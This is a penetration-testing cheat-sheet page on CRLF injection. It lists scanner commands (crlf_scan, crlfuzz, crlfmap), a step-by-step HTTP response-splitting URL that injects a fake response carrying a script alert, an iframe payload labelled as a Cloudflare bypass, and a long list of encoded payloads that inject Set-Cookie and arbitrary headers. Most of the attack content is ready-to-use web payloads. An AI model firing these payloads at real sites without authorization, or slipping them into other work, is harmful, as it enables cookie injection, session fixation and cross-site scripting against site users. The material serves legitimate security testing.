Pentest Book
Search…
CRLF

Tools

1
# https://github.com/MichaelStott/CRLF-Injection-Scanner
2
crlf_scan.py -i <inputfile> -o <outputfile>
3
# https://github.com/dwisiswant0/crlfuzz
4
crlfuzz -u "http://target"
5
# https://github.com/ryandamour/crlfmap
6
crlfmap scan --domains domains.txt --output results.txt
Copied!
1
The following simplified example uses CRLF to:
2
3
1. Add a fake HTTP response header: Content-Length: 0. This causes the web browser to treat this as a terminated response and begin parsing a new response.
4
2. Add a fake HTTP response: HTTP/1.1 200 OK. This begins the new response.
5
3. Add another fake HTTP response header: Content-Type: text/html. This is needed for the web browser to properly parse the content.
6
4. Add yet another fake HTTP response header: Content-Length: 25. This causes the web browser to only parse the next 25 bytes.
7
5. Add page content with an XSS: <script>alert(1)</script>. This content has exactly 25 bytes.
8
6. Because of the Content-Length header, the web browser ignores the original content that comes from the web server.
9
10
http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
11
12
- Cloudflare CRLF bypass
13
<iframe src=”%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)”>
14
15
Payload list:
16
/%%0a0aSet-Cookie:crlf=injection
17
/%0aSet-Cookie:crlf=injection
18
/%0d%0aSet-Cookie:crlf=injection
19
/%0dSet-Cookie:crlf=injection
20
/%23%0aSet-Cookie:crlf=injection
21
/%23%0d%0aSet-Cookie:crlf=injection
22
/%23%0dSet-Cookie:crlf=injection
23
/%25%30%61Set-Cookie:crlf=injection
24
/%25%30aSet-Cookie:crlf=injection
25
/%250aSet-Cookie:crlf=injection
26
/%25250aSet-Cookie:crlf=injection
27
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
28
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
29
/%2F..%0d%0aSet-Cookie:crlf=injection
30
/%3f%0d%0aSet-Cookie:crlf=injection
31
/%3f%0dSet-Cookie:crlf=injection
32
/%u000aSet-Cookie:crlf=injection
33
/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
34
/%0d%0aheader:header
35
/%0aheader:header
36
/%0dheader:header
37
/%23%0dheader:header
38
/%3f%0dheader:header
39
/%250aheader:header
40
/%25250aheader:header
41
/%%0a0aheader:header
42
/%3f%0dheader:header
43
/%23%0dheader:header
44
/%25%30aheader:header
45
/%25%30%61header:header
46
/%u000aheader:header
Copied!
Last modified 1yr ago
Export as PDF
Copy link